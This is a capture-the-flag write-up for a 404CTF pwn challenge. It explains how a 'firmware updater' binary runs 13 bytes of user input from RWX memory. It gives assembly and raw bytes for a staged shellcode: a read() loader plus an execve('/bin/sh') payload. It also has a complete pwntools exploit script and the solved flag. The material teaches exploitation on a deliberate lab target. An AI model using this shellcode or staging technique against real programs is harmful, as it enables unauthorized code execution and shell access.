TL;DR
RWX memory + 13-byte size limit = staged shellcode time! Upload a tiny loader (13 bytes) that reads a bigger shellcode (24 bytes), then execute it to get shell π
Challenge Files: chall (ELF binary)
Note: This is one of my first CTF writeups! At the time I solved this challenge, I was just starting out with pwn. There are probably cleaner/simpler ways to solve this, but this approach worked for me. If you spot improvements, feel free to share! π
Challenge Overview
We’re given a “Firmware Updater v1.0” for a “space core”.
The program has 3 options:
1. Upload an update <- Our entry point
2. Run the firmware <- Executes our code
3. Open a bidirectional connection <- Just exits
Binary Protections
Let’s check what we’re dealing with:
$ checksec chall
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: PIE enabled
Stripped: No
What this means:
- β NX enabled - Stack isn’t executable (doesn’t matter, we have RWX mmap!)
- β PIE enabled - Addresses are randomized (also doesn’t matter for us)
- β No canary - Stack overflow protection disabled
- β οΈ Partial RELRO - GOT is writable
But here’s the thing: none of this matters because the program literally gives us RWX memory and executes whatever we send! The protections are meaningless when there’s a deliberate code execution feature. π
Source Code Analysis
Let’s look at the juicy parts:
long firmware_max_size = 0xd; // Only 13 bytes!
void *firmware;
// Allocate RWX memory - the good stuff
firmware = mmap(NULL, 0x1000,
PROT_READ | PROT_WRITE | PROT_EXEC,
MAP_ANONYMOUS | MAP_PRIVATE, -1, 0);
The program allocates 4KB (0x1000 bytes) with RWX permissions - read, write, AND execute. That’s shellcode heaven! But there’s a catch…
void upload_update(long firmware_max_size, void* firmware) {
printf("Ready to receive update > ");
bytes_read = read(0, firmware, firmware_max_size);
}
void apply_update(void* firmware) {
((void (*)())firmware)(); // Cast and execute!
}
The problem: We can only upload 13 bytes (0xd), but a full /bin/sh shellcode needs at least 20-30 bytes. Houston, we have a problem! π¨
The Solution: Staged Shellcode
Since we can’t fit everything in 13 bytes, we’ll use a two-stage approach:
- Stage 1 (13 bytes): A tiny loader that reads more data
- Stage 2 (24 bytes): The actual execve shellcode
Think of it like a rocket: Stage 1 gets us into orbit, Stage 2 takes us to the moon! π
Stage 1: The Loader (13 bytes)
This shellcode reads additional bytes from stdin and stores them right after itself:
lea rsi, [rdi+0xd] ; Calculate where to write (firmware + 13)
xor edi, edi ; fd = 0 (stdin)
xor eax, eax ; syscall number 0 (read)
push 0x18 ; Length to read (24 bytes)
pop rdx ; rdx = 24 (size)
syscall ; Call read(0, firmware+13, 24)
Machine code: \x48\x8d\x77\x0d\x31\xff\x31\xc0\x6a\x18\x5a\x0f\x05
How it works:
- When
apply_update()is called,rdicontains the firmware address (function argument) lea rsi, [rdi+0xd]calculates the address right after our 13-byte shellcode- We set up registers for
read(0, firmware+13, 24)syscall - After the syscall, execution continues right into Stage 2!
Stage 2: The Shell (24 bytes)
This is a classic execve("/bin/sh") shellcode:
xor rsi, rsi ; rsi = NULL (argv)
push rsi ; Push NULL (string terminator)
mov rdi, 0x68732f6e69622f2f ; Load "//bin/sh" (little-endian)
push rdi ; Push "//bin/sh" onto stack
push rsp ; Push address of string
pop rdi ; rdi = address of "/bin/sh"
xor rdx, rdx ; rdx = NULL (envp)
mov al, 0x3b ; syscall 59 (execve)
syscall ; Call execve("/bin/sh", NULL, NULL)
Machine code: \x48\x31\xf6\x56\x48\xbf\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x57\x54\x5f\x48\x31\xd2\xb0\x3b\x0f\x05
Exploitation Flow
Here’s how the magic happens:
ββββββββββββββββ
β 1. Upload β Send Stage 1 (13 bytes)
β Update β
ββββββββ¬ββββββββ
β
βΌ
ββββββββββββββββ
β 2. Run β Execute Stage 1
β Firmware β
ββββββββ¬ββββββββ
β
βΌ
ββββββββββββββββ
β Stage 1 β Calls read() to get more data
β executing... β Reads 24 more bytes
ββββββββ¬ββββββββ
β
βΌ
ββββββββββββββββ
β Send Stage 2 β Our execve shellcode
β (24 bytes) β
ββββββββ¬ββββββββ
β
βΌ
ββββββββββββββββ
β Stage 2 β Spawns /bin/sh
β executing... β
ββββββββ¬ββββββββ
β
βΌ
π SHELL!
Memory Layout
Before exploitation:
βββββββββββββββββββββββββββββββββββββββ
β firmware address (0x1000 bytes) β
β Permissions: RWX β
β Empty... β
βββββββββββββββββββββββββββββββββββββββ
After uploading Stage 1:
βββββββββββββββββββββββββββββββββββββββ
β Stage 1 (13 bytes) β
βββββββββββββββββββββββββββββββββββββββ€
β Empty... β
βββββββββββββββββββββββββββββββββββββββ
After Stage 1 executes:
βββββββββββββββββββββββββββββββββββββββ
β Stage 1 (13 bytes) β
βββββββββββββββββββββββββββββββββββββββ€
β Stage 2 (24 bytes) β Just loaded! β
βββββββββββββββββββββββββββββββββββββββ€
β Empty... β
βββββββββββββββββββββββββββββββββββββββ
Exploit Script
from pwn import *
# Connect to target
io = remote('challenges.404ctf.fr', PORT)
# or for local: io = process('./chall')
# Stage 1: Tiny loader (13 bytes)
stage1 = b"\x48\x8d\x77\x0d" # lea rsi, [rdi+0xd]
stage1 += b"\x31\xff" # xor edi, edi
stage1 += b"\x31\xc0" # xor eax, eax
stage1 += b"\x6a\x18" # push 0x18
stage1 += b"\x5a" # pop rdx
stage1 += b"\x0f\x05" # syscall
log.info(f"Stage 1 size: {len(stage1)} bytes")
# Stage 2: execve("/bin/sh") (24 bytes)
stage2 = b"\x48\x31\xf6" # xor rsi, rsi
stage2 += b"\x56" # push rsi
stage2 += b"\x48\xbf\x2f\x2f\x62\x69\x6e\x2f\x73\x68" # mov rdi, "//bin/sh"
stage2 += b"\x57" # push rdi
stage2 += b"\x54" # push rsp
stage2 += b"\x5f" # pop rdi
stage2 += b"\x48\x31\xd2" # xor rdx, rdx
stage2 += b"\xb0\x3b" # mov al, 0x3b
stage2 += b"\x0f\x05" # syscall
log.info(f"Stage 2 size: {len(stage2)} bytes")
# Step 1: Upload Stage 1
io.sendlineafter(b'> ', b'1')
io.sendafter(b'> ', stage1)
# Step 2: Execute firmware (Stage 1 runs and waits for input)
io.sendlineafter(b'> ', b'2')
# Step 3: Stage 1 is now waiting on read() - send Stage 2!
io.send(stage2)
# Get shell!
io.interactive()
Key Technical Points
1. The ModR/M Byte Matters!
A common mistake: using lea rsp, [rdi+0xd] instead of lea rsi, [rdi+0xd]. This would corrupt the stack pointer instead of setting up our destination address. Always double-check your assembly! π
2. Why Staged Shellcode?
This technique is super common in real exploits:
- Limited initial space (buffer size restrictions)
- Used in tools like Metasploit
- Allows complex payloads despite space constraints
3. Direct Syscalls
We use raw syscalls instead of libc functions for:
- Smaller code size
- Maximum compatibility
- No dependency on libc addresses
4. The “/bin/sh” String
We use //bin/sh (8 bytes) instead of /bin/sh (7 bytes) because it fits perfectly in a 64-bit register. The extra / doesn’t hurt - Linux treats // like /.
Lessons Learned
Exploitation techniques:
- Staged payloads - When space is limited, load a small loader first
- RWX memory abuse - If you can write and execute, game over
- Register conventions - Understanding calling conventions (rdi = first arg)
- Shellcode optimization - Every byte counts when space is tight
- Stack manipulation - Building strings on the stack for execve
Flag
404CTF{wh3n_l1fe_91ve5_you_LeMOn...}
